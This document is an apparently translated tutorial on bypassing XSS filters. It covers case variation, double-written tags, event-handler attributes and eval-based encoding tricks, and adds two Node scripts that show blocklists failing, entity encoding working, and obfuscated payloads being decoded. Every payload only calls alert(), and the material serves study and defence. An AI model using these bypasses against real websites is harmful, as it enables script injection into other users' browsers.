Without going into the underlying theory, this page covers bypass techniques, analysis of common phishing payloads, and setting up mailbox notifications.
Base payload (the one the filters below try to block):
<script>alert('xss')</script>
# Bypass methods
# Case variation bypass
Works when the filter matches the tag name case-sensitively: the browser treats HTML tag names case-insensitively, so the payload still runs.
<sCriPT>alert('xss')</sCrIPT>
# Double-write bypass
Works when the filter deletes the blocked keyword in a single pass: removing "script" once from "scrscriptipt" leaves "script" behind, and the browser receives an ordinary script tag.
<scrscriptipt>alert('xss')</scrscriptipt>
# Switching to other tags
If the script tag is blocked, any other element that accepts an event-handler attribute will do: <a, <img, <div, <body, <input with onmouseover, onmouseout, onmousemove, onclick, onerror, onload... Examples by tag:
<img>
<!-- src does not resolve, so onerror fires without any user interaction -->
<img src='zzzz' onerror='alert(1)' />
<a>
<!-- fires on mouse hover -->
<a onmouseover="alert('XSS')">hover to trigger</a>
<!-- fires on click -->
<a onclick="alert('XSS')">click to trigger</a>
<!-- fires when the mouse leaves the element -->
<a onmouseout="alert('XSS')">mouse out to trigger</a>
<div>
<!-- fires on mouse hover -->
<div onmouseover="alert('XSS attack!')">hover over this area</div>
<!-- fires on click -->
<div onclick="alert('XSS attack!')">click this area</div>
<body>
<body onload="alert('XSS')"
      onunload="alert('XSS')"
      onhashchange="alert('XSS')">
<input>
<!-- onfocus/onblur need the field to gain or lose focus; adding the autofocus attribute fires onfocus without user interaction -->
<input type="text" onfocus="alert('XSS')" />
<input type="text" onblur="alert('XSS')" />
<!-- onerror only fires if the image fails to load, so give it a src that does not resolve -->
<input type="image" src="x" onerror="alert('XSS')" />
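As an added example (not code from the original page), the script below models the substring blocklist that the case, double-write and tag-switch bypasses above are aimed at, runs the page's payloads through it, and shows that HTML entity encoding at output time is what actually removes them. The filter, the survivor check and PAYLOADS are constructed for this demonstration.

```javascript
// Added example, not taken from the original page: a substring blocklist
// filter of the kind these bypasses are aimed at, run over the page's payloads,
// next to the HTML entity encoding that stops all of them. PAYLOADS is a
// constructed sample set copied from the sections above.

const PAYLOADS = {
  plain:       "<script>alert('xss')</script>",
  mixedCase:   "<sCriPT>alert('xss')</sCrIPT>",
  doubleWrite: "<scrscriptipt>alert('xss')</scrscriptipt>",
  imgOnerror:  "<img src='zzzz' onerror='alert(1)' />",
  aOnclick:    "<a onclick=\"alert('XSS')\">click to trigger</a>",
  bodyOnload:  "<body onload=\"alert('XSS')\">",
};

// The weak control: delete the word "script" in one global pass.
// ignoreCase=false is what the case-variation bypass defeats;
// ignoreCase=true still loses to double-writing and to other tags.
function blocklistFilter(input, ignoreCase = false) {
  return input.replace(new RegExp('script', ignoreCase ? 'gi' : 'g'), '');
}

// Crude check for this demo only: is there still a <script> tag (any case)
// or an inline on*= handler sitting inside a tag? Real sanitisers parse HTML.
function stillExecutable(html) {
  return /<script\b/i.test(html) || /<\w+[^>]*\bon\w+\s*=/i.test(html);
}

// Run every payload through a filter and return the names of the survivors.
function survivors(filter) {
  return Object.entries(PAYLOADS)
    .filter(([, payload]) => stillExecutable(filter(payload)))
    .map(([name]) => name);
}

// The fix: encode for the HTML text context instead of deleting substrings.
// Every '<' becomes '&lt;', so no tag (and therefore no handler) can form.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

console.log('case-sensitive blocklist lets through:  ', survivors((p) => blocklistFilter(p, false)));
console.log('case-insensitive blocklist lets through:', survivors((p) => blocklistFilter(p, true)));
console.log('entity encoding lets through:           ', survivors(escapeHtml));
```

Run it with node. Entity encoding is the right fix for the HTML body context only: a value placed inside an attribute, a script block or a URL needs that context's own encoder, and a regex check like stillExecutable is a demo aid, not something to ship.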
# Encoding bypasses when functions are blocked
If a function name such as alert is blocked, the name can be assembled at runtime and handed to JavaScript's eval, using String.fromCharCode(), escape sequences, string concatenation or base64, so the literal string "alert" never appears in the payload.
# Using String.fromCharCode()
The static method String.fromCharCode() returns a string created from the given sequence of UTF-16 code units.
String.fromCharCode(65, 66, 67); // returns "ABC"
String.fromCharCode(0x2014); // returns "—"
String.fromCharCode(0x12014); // also returns "—": each argument is truncated to 16 bits, so the leading 1 is dropped
String.fromCharCode(8212); // also returns "—": 8212 is 0x2014 in decimal
String.fromCharCode() bypass (the code units spell alert('XSS')):
<script>
eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))
</script>
Array join bypass (the function name is only assembled at runtime):
<script>
eval(['al','ert'].join('')+'("XSS")')
</script>
Hex escape (\xHH) bypass:
<script>
eval('\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29')
</script>
Unicode escape (\uHHHH) bypass:
<script>
eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0027\u0058\u0053\u0053\u0027\u0029')
</script>
base64 bypass (atob decodes the string back to alert('XSS') in the browser):
<script>
eval(atob('YWxlcnQoJ1hTUycp'))
</script>
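Each of the five payloads above evaluates the same call. As an added example that is not part of the original page, the normaliser below undoes those encodings so the eval() argument can be read in plain text, which is useful when triaging captured requests or testing filter rules. SAMPLES is the page's payloads embedded as constructed input, Buffer stands in for the browser's atob, and the function and regex names are this example's own.

```javascript
// Added example, not from the original page: a normaliser that reverses the
// encodings shown above (String.fromCharCode, array join, \xHH and \uHHHH
// escapes, atob) so the eval() argument becomes readable. Sample inputs are
// the page's own payloads, embedded here as constructed test data.

const SAMPLES = [
  "eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))",
  "eval(['al','ert'].join('')+'(\"XSS\")')",
  "eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x27\\x58\\x53\\x53\\x27\\x29')",
  "eval('\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0027\\u0058\\u0053\\u0053\\u0027\\u0029')",
  "eval(atob('YWxlcnQoJ1hTUycp'))",
];

const SIMPLE_ESCAPES = { n: '\n', r: '\r', t: '\t', '0': '\0' };

// Resolve \xHH, \uHHHH and the usual single-character escapes in a literal body.
function unescapeJs(body) {
  return body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|[\s\S])/g, (m, e) => {
    if (e.length > 1) return String.fromCharCode(parseInt(e.slice(1), 16));
    return e in SIMPLE_ESCAPES ? SIMPLE_ESCAPES[e] : e;
  });
}

// Rewrite each obfuscation into a JSON-quoted string literal, fold the pieces
// together, and return the eval() argument if the result is a single literal.
function revealEvalPayload(snippet) {
  let s = snippet;

  // 1. String.fromCharCode(97,108,...) -> "alert('XSS')"
  s = s.replace(/String\.fromCharCode\(([^()]*)\)/g, (m, args) => {
    const codes = args.split(',').map((a) => Number(a.trim())).filter((n) => !Number.isNaN(n));
    return JSON.stringify(String.fromCharCode(...codes));
  });

  // 2. atob('...') -> decoded literal (Buffer replaces the browser's atob here)
  s = s.replace(/atob\(\s*(['"])([A-Za-z0-9+/=]*)\1\s*\)/g, (m, q, b64) =>
    JSON.stringify(Buffer.from(b64, 'base64').toString('latin1')));

  // 3. every remaining string literal -> JSON-quoted literal with escapes resolved
  s = s.replace(/"((?:\\.|[^"\\])*)"|'((?:\\.|[^'\\])*)'/g, (m, d, q) =>
    JSON.stringify(unescapeJs(d !== undefined ? d : q)));

  // 4. ["al","ert"].join("") -> "alert"
  s = s.replace(/\[\s*((?:"(?:\\.|[^"\\])*"\s*,?\s*)+)\]\.join\(\s*""\s*\)/g, (m, items) =>
    JSON.stringify(items.match(/"(?:\\.|[^"\\])*"/g).map((x) => JSON.parse(x)).join('')));

  // 5. "a"+"b" -> "ab", repeated until nothing is left to fold
  const concat = /"((?:\\.|[^"\\])*)"\s*\+\s*"((?:\\.|[^"\\])*)"/;
  for (let prev = null; prev !== s; ) {
    prev = s;
    s = s.replace(concat, (m, a, b) => JSON.stringify(JSON.parse(`"${a}"`) + JSON.parse(`"${b}"`)));
  }

  // 6. if the whole snippet is eval("<literal>"), return the literal's value;
  //    otherwise return the partially normalised snippet for manual review
  const m = /^\s*eval\(\s*("(?:\\.|[^"\\])*")\s*\)\s*;?\s*$/.exec(s);
  return m ? JSON.parse(m[1]) : s;
}

function revealAll() {
  return SAMPLES.map(revealEvalPayload);
}

for (const sample of SAMPLES) console.log(sample, '=>', revealEvalPayload(sample));
```

The array-join variant decodes to alert("XSS") rather than alert('XSS') because the page's payload uses double quotes inside the concatenated string; the call is the same. Nested or chained encodings (for example atob inside fromCharCode) are not handled by a single pass of this normaliser.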